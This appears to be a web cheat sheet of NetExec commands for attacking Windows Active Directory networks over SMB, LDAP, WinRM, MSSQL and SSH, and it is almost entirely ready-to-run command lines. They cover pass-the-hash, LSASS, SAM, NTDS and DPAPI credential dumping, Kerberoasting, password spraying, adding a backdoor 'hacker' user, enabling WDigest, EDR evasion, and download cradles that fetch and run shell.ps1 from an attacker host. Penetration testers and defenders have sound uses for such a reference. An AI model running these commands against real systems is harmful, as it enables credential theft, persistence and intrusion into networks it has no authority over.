Skip to main content
NetExec is the actively maintained successor to CrackMapExec. It speaks SMB, LDAP, WinRM, MSSQL, SSH, RDP, FTP, and more: use it for credential validation, enumeration, lateral movement, and post-exploitation across an entire subnet in one command. 
# Install / update
pipx install netexec
pipx upgrade netexec

# List all available modules for a protocol
nxc smb -L
nxc ldap -L

# Get options for a specific module
nxc smb -M lsassy --options

SMB

SMB is the primary protocol for Windows enumeration and lateral movement. Start unauthenticated to see what’s exposed, then escalate to authenticated enumeration once you have credentials.

Host Discovery

Sweep a subnet to find live Windows hosts and identify domain membership, OS version, and SMB signing status. 
nxc smb $SUBNET                                  # discover all SMB hosts on subnet
nxc smb $SUBNET --gen-relay-list relay.txt       # output hosts with signing disabled (relay targets)
nxc smb targets.txt                              # read targets from file

Null and Guest Sessions

Test for unauthenticated access before using credentials: null sessions often expose user lists and share names. 
nxc smb $IP -u '' -p ''                          # null session
nxc smb $IP -u 'guest' -p ''                     # guest account (often enabled)
nxc smb $IP -u '' -p '' --shares                 # enumerate shares via null session
nxc smb $IP -u '' -p '' --users                  # list users via null session
nxc smb $IP -u '' -p '' --pass-pol              # dump password policy (check lockout threshold)

Credential Validation

A (+) or [+] in the output means the credential is valid. Pwn3d! means you have admin rights on that host. 
nxc smb $IP -u $USER -p $PASSWORD               # basic auth check
nxc smb $IP -u $USER -p $PASSWORD --local-auth  # auth against local SAM (not domain)
nxc smb $IP -u $USER -H $HASH                   # pass-the-hash
nxc smb $IP -u $USER -H $HASH --local-auth      # PTH against local account
nxc smb $IP -u $USER --use-kcache               # use active Kerberos ticket (KRB5CCNAME must be set)
nxc smb $IP -u $USER -p $PASSWORD -d $DOMAIN    # specify domain explicitly
nxc smb $IP -u $USER -p $PASSWORD --kdcHost $DC_HOST  # specify KDC for Kerberos

Share Enumeration

List all shares and their access level: look for non-default shares like backup, data, scripts, IT. 
nxc smb $IP -u $USER -p $PASSWORD --shares       # list shares + read/write access
nxc smb $IP -u $USER -p $PASSWORD --disks        # list local disks on the target

Share Spidering

Recursively enumerate file contents across all shares: outputs a JSON map of every readable file path. 
nxc smb $IP -u $USER -p $PASSWORD -M spider_plus                        # spider all readable shares
nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o SHARE=Data          # spider specific share
nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o READ_ONLY=false     # also download files
nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o EXCLUDE_EXTS=exe,dll  # skip binary files
nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o PATTERN=password    # flag files matching pattern

File Operations

Download or upload files directly over SMB without a separate tool. 
nxc smb $IP -u $USER -p $PASSWORD --get-file '\\share\path\file.txt' ./local_file.txt  # download
nxc smb $IP -u $USER -p $PASSWORD --put-file ./local.txt '\\share\path\remote.txt'     # upload

User and Group Enumeration

Pull users, groups, logged-on sessions, and local admins from the target. 
nxc smb $IP -u $USER -p $PASSWORD --users        # list domain users (via SAM/SAMR)
nxc smb $IP -u $USER -p $PASSWORD --groups       # list domain groups
nxc smb $IP -u $USER -p $PASSWORD --local-groups # list local groups on target
nxc smb $IP -u $USER -p $PASSWORD --loggedon-users  # show currently logged-on users
nxc smb $IP -u $USER -p $PASSWORD --sessions     # show active SMB sessions
nxc smb $IP -u $USER -p $PASSWORD --pass-pol    # dump domain password policy

RID Brute Force

Enumerate accounts by brute-forcing RIDs over SAMR: works even when --users is restricted, and finds local accounts too. 
nxc smb $IP -u $USER -p $PASSWORD --rid-brute   # brute RIDs 500-4000 (default)
nxc smb $IP -u $USER -p $PASSWORD --rid-brute 10000  # brute RIDs up to 10000
nxc smb $IP -u '' -p '' --rid-brute             # attempt via null session

Command Execution

Run commands on the remote host: -x uses cmd.exe, -X uses PowerShell. Requires admin rights. 
nxc smb $IP -u $USER -p $PASSWORD -x 'whoami /all'          # cmd.exe execution
nxc smb $IP -u $USER -p $PASSWORD -X 'Get-Process'          # PowerShell execution
nxc smb $IP -u $USER -p $PASSWORD -x 'whoami' --exec-method wmiexec   # use WMI (no service creation)
nxc smb $IP -u $USER -p $PASSWORD -x 'whoami' --exec-method mmcexec   # use MMC (stealthy)
nxc smb $IP -u $USER -p $PASSWORD -x 'whoami' --exec-method smbexec   # use SMB pipe (no binary)
nxc smb $IP -u $USER -p $PASSWORD -x 'whoami' --exec-method atexec    # use task scheduler
nxc smb $IP -u $USER -p $PASSWORD --no-output -x 'net user hacker Pass123! /add'  # suppress output

Credential Dumping

Dump credential stores from the target: all require admin rights. Prefer lsassy over --sam when possible as it handles protections better. 
# SAM database (local account hashes)
nxc smb $IP -u $USER -p $PASSWORD --sam

# LSA secrets (service account creds, DPAPI keys, cached domain hashes)
nxc smb $IP -u $USER -p $PASSWORD --lsa

# LSASS via lsassy module (handles multiple dump methods automatically)
nxc smb $IP -u $USER -p $PASSWORD -M lsassy
nxc smb $IP -u $USER -p $PASSWORD -M lsassy -o METHOD=comsvcs   # use comsvcs.dll
nxc smb $IP -u $USER -p $PASSWORD -M lsassy -o METHOD=procdump  # use procdump.exe (upload required)
nxc smb $IP -u $USER -p $PASSWORD -M lsassy -o METHOD=nanodump  # use nanodump (EDR evasion)

# DPAPI secrets (browser saved passwords, credential manager)
nxc smb $IP -u $USER -p $PASSWORD -M dpapi                      # dump all DPAPI secrets
nxc smb $IP -u $USER -p $PASSWORD -M dpapi -o MKFILE=masterkeys.txt  # use pre-dumped masterkeys

# NTDS.dit via ntdsutil (DC only: uses IFM to extract)
nxc smb $DC_IP -u $USER -p $PASSWORD -M ntdsutil

# Backup Operator privilege abuse (dump SAM/SYSTEM/SECURITY via backup rights)
nxc smb $DC_IP -u $USER -p $PASSWORD -M backup_operator

Host Information

Pull system info and generate a hosts file for internal network mapping. 
nxc smb $IP -u $USER -p $PASSWORD --generate-hosts-file hosts.txt   # write /etc/hosts-format file
nxc smb $SUBNET -u $USER -p $PASSWORD --generate-hosts-file internal_hosts.txt

Password Change

Change passwords via SMB: useful for self-service changes or when you have ForceChangePassword on another account. 
# Change your own password (knows current)
nxc smb $IP -u $USER -p $PASSWORD -M change-password -o NEWPASS='NewPass123!'

# Change own password using hash (PTH self-service)
nxc smb $IP -u $USER -H $HASH -M change-password -o NEWPASS='NewPass123!'

# Force change another user's password (requires ForceChangePassword ACE)
nxc smb $IP -u $USER -p $PASSWORD -M change-password -o USER=$TARGET NEWPASS='NewPass123!'

# Force change using hash
nxc smb $IP -u $USER -H $HASH -M change-password -o USER=$TARGET NEWPASS='NewPass123!'

Miscellaneous SMB Modules

Additional recon and abuse modules useful during post-exploitation. 
nxc smb $IP -u $USER -p $PASSWORD -M wdigest -o ACTION=enable   # enable WDigest (plaintext in LSASS)
nxc smb $IP -u $USER -p $PASSWORD -M wdigest -o ACTION=disable  # disable WDigest
nxc smb $IP -u $USER -p $PASSWORD -M web_delivery -o URL=http://$LHOST/shell.ps1  # trigger download cradle
nxc smb $IP -u $USER -p $PASSWORD -M empire_exec -o LISTENER=http AGENT=<agent>  # Empire exec
nxc smb $IP -u $USER -p $PASSWORD -M coerce_plus                # test coercion methods (printerbug, petitpotam, etc.)
nxc smb $IP -u $USER -p $PASSWORD -M runasppl                   # check RunAsPPL (LSASS protection)
nxc smb $IP -u $USER -p $PASSWORD -M uac                        # check UAC configuration
nxc smb $IP -u $USER -p $PASSWORD -M rdp -o ACTION=enable       # enable RDP
nxc smb $IP -u $USER -p $PASSWORD -M rdp -o ACTION=disable      # disable RDP

LDAP

LDAP is the primary channel for querying Active Directory. Use it for targeted attribute enumeration, BloodHound collection, and Kerberos-based attacks.

Credential Validation

Validate domain credentials against the DC via LDAP: lighter than SMB and works even when SMB is firewalled. Always include -d <domain> and --dns-server <dc-ip> so nxc can resolve AD hostnames correctly; without them BloodHound collection and many enumeration modules will fail silently or return incomplete results. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP   # basic LDAP auth check
nxc ldap $DC_IP -u $USER -H $HASH -d $DOMAIN --dns-server $DC_IP        # PTH via LDAP
nxc ldap $DC_IP -u $USER --use-kcache -d $DOMAIN --dns-server $DC_IP    # use Kerberos ticket

User Enumeration

Pull user accounts and attributes directly from the directory. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --users                 # list all domain users
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --users --no-sort       # preserve LDAP order
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --groups                # list all domain groups
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --computers             # list all computer accounts
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --admin-count           # find accounts with adminCount=1
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --password-not-required # find accounts with PASSWD_NOTREQD flag
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --trusted-for-delegation # find unconstrained delegation accounts
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --subnets               # list AD subnets

Description Field Mining

The get-desc-users module reads every user’s Description field: admins commonly store passwords there as “notes”. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M get-desc-users                        # dump all account Description fields
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M get-desc-users -o KEYWORDS=pass,pwd,cred  # filter by keyword

Custom LDAP Queries

Run arbitrary LDAP filters to extract any attribute from any object class. 
# Full attribute dump for matching objects
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(sAMAccountType=805306368)" "*"

# Selected attributes only
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(sAMAccountType=805306368)" "sAMAccountName,description,memberOf"

# Accounts with SPN set (Kerberoastable)
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(&(sAMAccountType=805306368)(servicePrincipalName=*))" "sAMAccountName,servicePrincipalName"

# Accounts with pre-auth disabled (AS-REP roastable)
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" "sAMAccountName"

# Accounts with PASSWD_NOTREQD
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(userAccountControl:1.2.840.113556.1.4.803:=32)" "sAMAccountName"

# Computers with unconstrained delegation (excluding DCs)
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))" "name,dNSHostName"

# Find dMSA objects (Windows Server 2025 BadSuccessor)
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --query "(objectClass=msDS-DelegatedManagedServiceAccount)" "name,msDS-ManagedAccountPrecededByLink"

Group Membership

Check which groups a specific user belongs to: useful for understanding what access a compromised account has. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M groupmembership -o USER=$TARGET      # list groups for user
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M groupmembership -o GROUP="Domain Admins" # list members of group

BloodHound Collection

Collect all AD relationship data in BloodHound format: import the zip into BloodHound CE for graph analysis. The -d and --dns-server flags are required for name resolution; without them computer object resolution fails and the graph will be missing edges. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --bloodhound -c all       # collect all BloodHound data
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --bloodhound -c DCOnly    # DC-only collection (faster, less noise)
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M bloodhound -o COLLECTION=all           # module alternative
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M bloodhound -o COLLECTION=all,LoggedOn  # include logged-on users

Kerberoasting

Request TGS tickets for all SPN-registered accounts: output is in hashcat format ready for offline cracking. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --kerberoast hashes.txt     # request all kerberoastable TGS hashes
nxc ldap $DC_IP -u $USER -H $HASH -d $DOMAIN --dns-server $DC_IP --kerberoast hashes.txt # PTH version
# Crack: hashcat -m 13100 hashes.txt ~/tools/wordlists/rockyou

AS-REP Roasting

Request AS-REP for accounts with pre-authentication disabled: works without credentials if you have a username list. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --asreproast hashes.txt     # authenticated, auto-discovers targets
nxc ldap $DC_IP -u '' -p '' -d $DOMAIN --dns-server $DC_IP --asreproast hashes.txt               # unauthenticated (null session)
nxc ldap $DC_IP -u users.txt -p '' -d $DOMAIN --dns-server $DC_IP --asreproast hashes.txt        # test specific user list
# Crack: hashcat -m 18200 hashes.txt ~/tools/wordlists/rockyou

LAPS Passwords

Retrieve LAPS-managed local admin passwords: the ms-Mcs-AdmPwd attribute is readable by accounts explicitly granted access. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --laps                 # dump all LAPS passwords you can read
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M laps                # module variant
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP --laps --computer DC01 # LAPS for specific computer

gMSA Passwords

Retrieve Group Managed Service Account passwords: requires membership in the account’s PrincipalsAllowedToRetrieveManagedPassword group. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M gmsa                # retrieve all readable gMSA passwords

LDAP Security Checks

Check whether the DC enforces LDAP signing and channel binding: if not enforced, LDAP relay attacks are possible. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M ldap-checker        # check signing + channel binding enforcement
nxc ldap $DC_IP -u '' -p '' -d $DOMAIN --dns-server $DC_IP -M ldap-checker                  # also test without credentials

Machine Account Quota

Check how many machine accounts unprivileged users can create: if above 0, RBCD and other attacks requiring a computer account become trivial. 
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M maq                 # read ms-DS-MachineAccountQuota

WinRM

WinRM (port 5985 HTTP, 5986 HTTPS) provides remote PowerShell access. Requires the account to be in the Remote Management Users group or a local admin.

Credential Validation

A (+) response confirms WinRM access: Pwn3d! is not shown for WinRM since access itself implies admin-equivalent rights. 
nxc winrm $IP -u $USER -p $PASSWORD                         # validate WinRM access
nxc winrm $IP -u $USER -H $HASH                             # PTH via WinRM
nxc winrm $IP -u $USER --use-kcache                         # Kerberos ticket auth
nxc winrm $IP -u $USER -p $PASSWORD --ssl                   # HTTPS (port 5986)

Command Execution

-x runs a raw command, -X runs PowerShell: both return output inline. 
nxc winrm $IP -u $USER -p $PASSWORD -x 'whoami /all'        # cmd.exe command
nxc winrm $IP -u $USER -p $PASSWORD -X 'Get-Process | Select-Object Name,Id'  # PowerShell command
nxc winrm $IP -u $USER -p $PASSWORD -X "IEX(New-Object Net.WebClient).DownloadString(\"http://$LHOST/shell.ps1\")"

MSSQL

MSSQL (default port 1433) is worth checking for weak auth and code execution via xp_cmdshell. Test Windows auth first, then SQL auth.

Authentication

Try Windows auth with -windows-auth before SQL auth: service accounts and domain users often have SQL access via their domain credentials. 
nxc mssql $IP -u $USER -p $PASSWORD                               # SQL auth
nxc mssql $IP -u $USER -p $PASSWORD -windows-auth                 # Windows/Kerberos auth
nxc mssql $IP -u $USER -H $HASH -windows-auth                     # PTH with Windows auth
nxc mssql $IP -u sa -p '' -windows-auth                           # blank sa password check
nxc mssql $SUBNET -u sa -p sa                                     # spray subnet for weak SA creds

Query Execution

Run arbitrary T-SQL queries: useful for enumerating linked servers, database contents, and permissions. 
nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT @@version"                                              # server version
nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT name FROM master.dbo.sysdatabases"                     # list databases
nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT name FROM master..syslogins"                           # list SQL logins
nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT * FROM openquery([$LINKED_SERVER], 'SELECT @@version')"  # linked server query
nxc mssql $IP -u $USER -p $PASSWORD -q "EXEC sp_linkedservers"                                        # enumerate linked servers
nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT IS_SRVROLEMEMBER('sysadmin')"                          # check sysadmin

xp_cmdshell

Enable and abuse xp_cmdshell for OS command execution: requires sysadmin or equivalent rights. 
nxc mssql $IP -u $USER -p $PASSWORD -x 'whoami'                   # auto-enables xp_cmdshell, runs cmd, disables after
nxc mssql $IP -u $USER -p $PASSWORD -x 'whoami' --no-output       # suppress output (for blind execution)

# Manual xp_cmdshell enablement via query
nxc mssql $IP -u $USER -p $PASSWORD -q "EXEC sp_configure 'show advanced options',1; RECONFIGURE"
nxc mssql $IP -u $USER -p $PASSWORD -q "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
nxc mssql $IP -u $USER -p $PASSWORD -q "EXEC xp_cmdshell 'whoami'"

SSH

SSH is less common in Windows AD environments but frequently found in Linux targets reachable from a Windows pivot, and in some mixed-OS environments.

Authentication and Execution

Test credentials and run commands: supports password auth, key auth, and Kerberos where configured. 
nxc ssh $IP -u $USER -p $PASSWORD                            # password auth
nxc ssh $IP -u $USER --key-file ~/.ssh/id_rsa                # private key auth
nxc ssh $IP -u $USER -p $PASSWORD -x 'id; hostname'         # command execution
nxc ssh $IP -u $USER -p $PASSWORD -x 'sudo -l'              # check sudo rights
nxc ssh $SUBNET -u root -p $PASSWORD -x 'id'                # sweep subnet

Password Spraying

Spray one password across many accounts: always check --pass-pol first to get the lockout threshold. Default approach: one password per user per spray cycle, wait between cycles. 
# Single password against a user list
nxc smb $IP -u users.txt -p 'Password123' --continue-on-success  # don't stop on first hit

# Single user against a password list (standard bruteforce)
nxc smb $IP -u administrator -p passwords.txt --continue-on-success

# 1:1 user:pass list (no cross-product bruteforce)
nxc smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Multiple passwords: pair carefully with lockout policy
nxc smb $IP -u users.txt -p 'Winter2024!' --continue-on-success
nxc smb $IP -u users.txt -p 'Spring2024!' --continue-on-success

# LDAP spray (quieter, Kerberos-based, doesn't hit SMB)
nxc ldap $DC_IP -u users.txt -p 'Password123' --continue-on-success

# Kerbrute-style via nxc (Kerberos pre-auth based)
nxc smb $IP -u users.txt -p 'Password123' --continue-on-success -d $DOMAIN --kdcHost $DC_HOST

Global Flags Reference

These flags apply across all protocols and control auth method, threading, and output behavior. 
# Authentication
-u <user>                  # username (file or single value)
-p <pass>                  # password (file or single value)
-H <hash>                  # NTLM hash (LM:NT or :NT format)
-d <domain>                # domain name
--local-auth               # authenticate against local accounts
--use-kcache               # use Kerberos ccache (requires KRB5CCNAME env var)
--kdcHost <host>           # specify KDC hostname for Kerberos
--dns-server <ip>          # DNS server for name resolution (required for LDAP/BloodHound in AD)
--aes-key <key>            # AES Kerberos key

# Targeting
-t <threads>               # number of parallel threads (default: 100)
--timeout <seconds>        # connection timeout per host (default: 5)
--port <port>              # custom port

# Credential spraying
--continue-on-success      # don't stop after first valid credential found
--no-bruteforce            # pair users and passwords 1:1 (no cross-product)

# Output and logging
--verbose                  # show more detail including errors
--debug                    # full debug output
--log <file>               # write output to file
-o <key=value>             # pass options to module

# Modules
-M <module>                # run a module
-L                         # list available modules for this protocol
--options                  # show options for selected module

Useful Module Reference

ModuleProtocolWhat it does
spider_plusSMBRecursively maps all readable shares to JSON, optionally downloads files
lsassySMBDumps LSASS memory remotely using multiple selectable methods
dpapiSMBExtracts DPAPI-protected secrets (browser passwords, Credential Manager)
ntdsutilSMBDumps NTDS.dit via ntdsutil IFM method (DC only)
backup_operatorSMBAbuses Backup Operator rights to extract SAM/SYSTEM/SECURITY hives
change-passwordSMBChanges a user password via SMB (self or ForceChangePassword)
wdigestSMBEnables or disables WDigest plaintext caching in LSASS
coerce_plusSMBTests various coercion primitives (PrinterBug, PetitPotam, DFSCoerce, etc.)
lapsLDAPReads LAPS-managed local admin passwords from ms-Mcs-AdmPwd
gmsaLDAPRetrieves Group Managed Service Account passwords
get-desc-usersLDAPDumps the Description field of all user accounts (often contains passwords)
groupmembershipLDAPLists members of a group or groups a specific user belongs to
ldap-checkerLDAPChecks LDAP signing and channel binding enforcement on the DC
bloodhoundLDAPCollects BloodHound-format AD data for graph import
maqLDAPReads ms-DS-MachineAccountQuota (affects RBCD attack feasibility)
rdpSMBEnables or disables Remote Desktop on the target
runaspplSMBChecks whether RunAsPPL (LSASS Protected Process) is enabled
uacSMBReads UAC configuration flags on the target
webdavSMBChecks if WebDAV (WebClient service) is running on the target